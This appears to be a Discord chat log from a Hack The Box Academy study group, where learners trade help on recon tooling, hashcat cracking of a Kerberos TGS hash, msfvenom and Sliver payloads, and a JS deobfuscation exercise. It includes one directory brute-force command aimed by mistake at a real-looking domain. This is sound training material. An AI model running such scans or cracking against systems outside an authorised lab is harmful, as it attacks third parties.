Module: Information Gathering - Web Edition
Section: Automating Recon
Command:
/finalrecon.py --dir -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt --url http://inlanefreight.com
I was trying to do the 'Skills Assessment' when this happened. I'm kind of panicking here...Should I worry about this?
Worry about what?
don't worry
Have you tried any other tools?
I used http://inlanefreight.com instead of http://inlanefreight.htb
he crawled the actual website
Oh
Yeah bro is done for😵
Sheesh I was scared for a second there
I'm changing all my notes to point to .htb
Idk why finalrecon example has .com. That's risky 
Anyone any good with VMware I've moved over from VirtualBox since its free and my uni uses it, but the NAT doesn't seem to work, i'm constantly disconnected. With virtualbox it just worked. Trying to use the ParrotOS HTB version
Not really, they made the website for these purposes, it even has flags
I thought it was an actual website 😭
I'm not that far in my studies, so I had no clue. That's good to know. Thank you!
Not that I know of. Make your own as you go, it's part of the learning process. You can hit /r/oscp and youtube to hear about other people's experiences getting the cert and they may have some structure you can borrow.
Hey how long does it take to complete Bug Bounty path
Totally depends on how much you already know, how much time you can dedicate to your education and how far beyond the reading material you go.
Can I join CTFs without certification
yes
Does CTFs provides any prize pool ??
maybe there are some that require the cert, idk... IDK about prizes. Yeah, I think I recall Cyber Apocalypse gives out a few grand to the top teams.
If htb paths beginner or advanced
For week 6 in the "cracking passwords with hashcat" "Skills assessment-Hashcat" module it has me decipher a Kerberos TGS ticket. where does the hash start? Also when I run hashcat it is omitting the beginning of the hash from when it starts its search. I would send a screenshot but it doesn't appear I can.
If you go to #welcome and follow the directions to link your discord/htb accounts you'll be able to share images and gain access to the rest of the discord server.
alright
There is nothing wrong with the msfvenom command as you are replacing the shellcode generated by msfvenom with the one from sliver
still need help with identifying where the hash begins though
The port in msfvenom is irrelevant as it gets replaced with the payload from sliver which contains the appropriate listening port in Sliver
How come on Analyzing it doesn't include "$8"
add ' ' around ur hash
the $8 was treated as an environment variable (bash uses $ as a special character to indicate them)
I shall
hi guys who can help me with deobfuscation i did deobfuscated the js code
but i didn't know what i need to place in answer
that was the issue, I just needed the half quotes
delete it please, it contains an answer
Thank you
thx for editing it
i know but site is calling me its wrong answer
what section of the module?
obfuscation js
yes, what section?
Did you take all the extra special characters out?
you practically had the answer in the code snippet.
Maybe try to check if there are spaces that don't belong, when you submit the answer
i tried many times
can you send me example
how should the answer look like
flag="HTB{..........} i tried how about that but thats incorrect answer
it was clear in the message u sent btw
just make sure ur taking stuff correctly
Try the actual value of the variable
I don't know if at this point my message is already providing the solution or still dropping hints, since you almost have it
i tried
HTB{...} not works
{....} not works
"HTB{...} not works i dnt understand
DM me, to avoid spoilers for others here
maybe i very stupid xd
is there an option in hashcat to just scan for all available hash algos? I'm not seeing anything in the man page
u mean scan a hash? or just see what hashcat supports in general?
this page can help:
https://hashcat.net/wiki/doku.php?id=example_hashes